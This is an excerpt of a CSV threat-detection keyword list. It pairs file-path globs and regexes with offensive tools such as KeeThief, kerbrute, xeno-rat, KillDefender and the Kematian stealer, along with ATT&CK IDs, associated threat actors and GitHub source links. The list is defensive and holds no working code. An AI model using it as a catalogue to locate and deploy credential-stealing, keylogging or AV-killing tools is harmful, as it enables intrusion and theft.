"*\KeeTheft.config*",".{0,1000}\\KeeTheft\.config.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16091"
"*\KeeTheft.exe*",".{0,1000}\\KeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeTheft","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16092"
"*\KeeTheft.exe*",".{0,1000}\\KeeTheft\.exe.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16093"
"*\KeeTheft.exe*",".{0,1000}\\KeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","0","N/A","private github repo","10","","N/A","","","","16094"
"*\KeeTheft.exe*",".{0,1000}\\KeeTheft\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16095"
"*\KeeTheft.INI*",".{0,1000}\\KeeTheft\.INI.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16096"
"*\KeeThief.ps1*",".{0,1000}\\KeeThief\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","16097"
"*\kekeo.exe*",".{0,1000}\\kekeo\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","16098"
"*\kematian.exe*",".{0,1000}\\kematian\.exe.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","N/A","N/A","10","","N/A","","","","16099"
"*\Kematian\*Browser Data*",".{0,1000}\\Kematian\\.{0,1000}Browser\sData.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","16100"
"*\Kematian\*Crypto Wallets*",".{0,1000}\\Kematian\\.{0,1000}Crypto\sWallets.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","16101"
"*\Kematian\*Important Files*",".{0,1000}\\Kematian\\.{0,1000}Important\sFiles.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","16102"
"*\Kematian\*Password Managers*",".{0,1000}\\Kematian\\.{0,1000}Password\sManagers.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","16103"
"*\Kematian-Stealer\*",".{0,1000}\\Kematian\-Stealer\\.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","0","N/A","N/A","10","","N/A","","","","16104"
"*\kerberoast.c*",".{0,1000}\\kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","16105"
"*\kerberoast.c*",".{0,1000}\\kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","16106"
"*\kerberoastables.txt*",".{0,1000}\\kerberoastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","16107"
"*\kerberoasting.c*",".{0,1000}\\kerberoasting\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","16108"
"*\KerberOPSEC.cs*",".{0,1000}\\KerberOPSEC\.cs.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","16109"
"*\KerberOPSEC.sln*",".{0,1000}\\KerberOPSEC\.sln.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","16110"
"*\Kerbeus-BOF\*",".{0,1000}\\Kerbeus\-BOF\\.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","16111"
"*\kerbrute.py*",".{0,1000}\\kerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","16112"
"*\KernelTokens.sys*",".{0,1000}\\KernelTokens\.sys.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","16113"
"*\KExecDD-main*",".{0,1000}\\KExecDD\-main.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","0","N/A","N/A","8","3","244","41","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z","16114"
"*\keycap.log*",".{0,1000}\\keycap\.log.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","16115"
"*\KeyCredentialLink.ps1*",".{0,1000}\\KeyCredentialLink\.ps1.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","16116"
"*\KeyDump.log*",".{0,1000}\\KeyDump\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16117"
"*\KeyDump.log*",".{0,1000}\\KeyDump\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","16118"
"*\keylistattack.py*",".{0,1000}\\keylistattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16120"
"*\keylog.cpp*",".{0,1000}\\keylog\.cpp.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","16121"
"*\keylog.exe*",".{0,1000}\\keylog\.exe.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","16122"
"*\keylog_tcp.txt*",".{0,1000}\\keylog_tcp\.txt.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","16123"
"*\KeyLogger.ahk*",".{0,1000}\\KeyLogger\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","16124"
"*\keyLogger.cs*",".{0,1000}\\keyLogger\.cs.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","16125"
"*\Keylogger.dll*",".{0,1000}\\Keylogger\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","16126"
"*\keylogger.exe*",".{0,1000}\\keylogger\.exe.{0,1000}","offensive_tool_keyword","keylogger","Keyboard recording","T1056.001","TA0006 - TA0009","N/A","N/A","Collection","https://github.com/uknowsec/keylogger","1","0","N/A","N/A","9","2","140","35","2021-05-19T08:33:58Z","2020-11-10T07:15:50Z","16127"
"*\Keylogger.ps1*",".{0,1000}\\Keylogger\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","16128"
"*\Keylogger.txt*",".{0,1000}\\Keylogger\.txt.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","16129"
"*\keylogger.txt*",".{0,1000}\\keylogger\.txt.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","16130"
"*\keylogger\src\main.rs*",".{0,1000}\\keylogger\\src\\main\.rs.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","16131"
"*\KeyLoggerOffline.*",".{0,1000}\\KeyLoggerOffline\..{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","N/A","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","16132"
"*\KidLogger\*",".{0,1000}\\KidLogger\\.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16133"
"*\KidLogger_is1*",".{0,1000}\\KidLogger_is1.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","#registry","registry","10","10","N/A","N/A","N/A","N/A","16134"
"*\Kill rats.Exe*",".{0,1000}\\Kill\srats\.Exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","16135"
"*\Kill_protector.py*",".{0,1000}\\Kill_protector\.py.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","16136"
"*\KillAV.exe*",".{0,1000}\\KillAV\.exe.{0,1000}","offensive_tool_keyword","Burntcigar KillAV","Scans for process names linked to known antivirus or EDR products - then adds their process IDs to a stack for later termination - often used by attackers","T1089 - T1489 - T1562","TA0005","KillAV","Cuba","Malware","https://www.virustotal.com/gui/file/aeb044d310801d546d10b247164c78afde638a90b6ef2f04e1f40170e54dec03?nocache=1","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","16137"
"*\Killchain.ps1*",".{0,1000}\\Killchain\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","16138"
"*\KillDefender.c*",".{0,1000}\\KillDefender\.c.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","16139"
"*\KillDefender.o*",".{0,1000}\\KillDefender\.o.{0,1000}","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","0","N/A","N/A","10","3","224","30","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z","16140"
"*\killer.cpp*",".{0,1000}\\killer\.cpp.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","16141"
"*\killer.exe*",".{0,1000}\\killer\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","16142"
"*\KillEvenlogService.ps1*",".{0,1000}\\KillEvenlogService\.ps1.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16143"
"*\KillEvenlogService.ps1*",".{0,1000}\\KillEvenlogService\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","16144"
"*\killmsas.exe*",".{0,1000}\\killmsas\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://github.com/ihamburglar/fgdump","1","0","N/A","N/A","10","1","8","4","2012-01-14T19:05:42Z","2015-10-11T17:08:47Z","16145"
